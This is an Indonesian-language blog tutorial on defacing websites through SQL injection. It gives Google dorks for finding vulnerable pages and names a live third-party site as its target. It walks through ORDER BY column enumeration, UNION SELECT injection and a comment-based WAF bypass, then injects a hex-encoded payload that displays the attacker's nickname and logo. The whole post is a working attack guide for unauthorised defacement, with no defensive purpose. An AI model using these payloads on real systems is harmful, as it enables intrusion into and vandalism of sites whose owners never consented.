ASSALAMMUALAIKUM GUYS:)
Kembali lagi dengan gw mimin ganteng ti sunda:v Oke kali ini gw bakal ngasih tutorial cara deface poc Sql injection (print nick+logo) . Oke sebelumnya sql injection itu apa si? jadi Sql Injection itu adalah sebuah teknik yang menyalah gunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah web
Bahan bahan yang harus lu sediain:
1. dork
2. Sc inject
3. Internet
4. kesabaran:v
DORK
- inurl://php?id=
- inurl://news?id=
- inurl://item?id=
bisa kalian racik sendiri aja biar dapet web yang vuln kalo misalkan gk dapet yang vuln.
LIVE TARGET
Oke kita masuk ke cara membuat Sc inject terlebih dahulu. Jika kalian sudah memilikinya tidak usah membuat scnya lagi
1. Siapkan logo kalian terlebih dahulu. lalu upload di web http://top4top.net, jika sudah ambil link logo tersebut
2. Pastekan link kalian kedalam "linkweb" yang ada dikodingan dibawah
3. Salin kodingan di atas
4. Buka web http://www.convertstring.com/id/EncodeDecode/HexEncode dan pastekan di kolom pertama lalu klik hex encode. maka akan muncul kode kode kalian salin dan simpen terserah lah dimna
nah dah jadi tuh sc injectnya sekarang kita masuk ke pepesnya
1. dorking di google dah, karena ada live target langsung aja masuk ke live targetnya.
jika muncul kata SQL berarti web itu vuln
3. Setelah kalian mengetahui web tersebut vuln laluKita tambahkan "+order+by+1--+- " dibelakang linknya
contoh
https://www.smtmax.com/category.php?id=15+order+by+1--+-
ternyata webnya gk error
https://www.smtmax.com/category.php?id=15+order+by+2--+-
https://www.smtmax.com/category.php?id=15+order+by+3--+-
dan seterusnya sampai webnya error
setelah di coba ternyata webnya error di no 15 berarti kolomnya itu ada 14, karena di no 14 tidak error. (https://www.smtmax.com/category.php?id=15+order+by+18--+-)
4. Ubah "+order+by+" Menjadi "+union+select+jumlah kolom"
contoh
https://www.smtmax.com/category.php?id=15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+-
Jika muncul tulisan " Not Acceptable!" atau "Forbidden" berarti webnya harus di Bypass Waf.
dengan mengganti "+union+select+" menjadi "+/!50000union/+/!50000select/+"
kebetulan live targetnya gk usah di Bypass Waf
5. Nah setelah menambahkan "+union+select+" maka akan muncul angka ajaib, jika angkanya tidak muncul kita tambahkan - setelah =
https://www.smtmax.com/category.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+-
Nah ternyata angka ajaibnya adalah 3
6. Nah selanjutnya kalian Pastekan sc inject kalian di nomor angka ajaib dengan menambahkan "0x" didepan sc injectnya. TARRAAAAAAA muncull dah nick sama logo kalian
mungkin cukup seklian tutor dari gw, jika kurang faham kalian tanyakan saja di kolom komentar atau langsung liat tutor di video dibawah ini. SEE YOU NEXT TIME GUYS:)
Youtube : Mr ProAL
Post a Comment